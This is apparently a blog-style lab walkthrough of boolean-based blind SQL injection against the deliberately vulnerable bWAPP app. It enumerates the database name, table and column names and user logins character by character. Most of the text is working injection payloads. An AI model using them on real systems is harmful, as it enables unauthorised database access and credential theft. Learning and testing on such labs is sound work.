We need to find the length of the database name. We can do this by using the length function and a number to specify the length of the database name.
a' or length(database())=2#
We find that the database name is five characters long. Our next step is to see if we can extract letter by letter the database name using the substring function available in mysql.
a' or substring(database(),1,1)='a'#
a' or substring(database(),1,1)='b'# a' or substring(database(),2,1)='W'# a' or substring(database(),3,1)='A'# a' or substring(database(),4,1)='P'# a' or substring(database(),5,1)='P'#
We find that the current databases name is 'bWAPP'. Now lets move on to tables and columns.
We have to iterate through the ascii table to see which characters give us a true statement so we can record the characters we receive.
a' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))>95# a' or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)))=104#
Here we find the first character of the table name is 104 or 'h'. We have to increment the substring counter up one to move on to the next character in the string.
After some time we identified a table called users we would like to investigate. Lets query the sql server and get back the details we are wanting.
a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))>95 a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=108 a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),2,1)))=111 a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),3,1)))=103 a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),4,1)))=105 a' or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),3,1)))=110
We found that the first column name is 'login' from our first go around. We would repeat the same steps just iterating the limit in the SQL query by one and start the process over again.
We want to select the 'login' column from the table 'users' and just like before we will be iterating through the characters one by one in order to complete the string.
a' or ascii(substring((SELECT login from users limit 0,1),1,1))>99 a' or ascii(substring((SELECT login from users limit 0,1),1,1))=65
We find that the first character of the login column is 'A'. we will continue like before until we reach a complete string,
No comments:
Post a Comment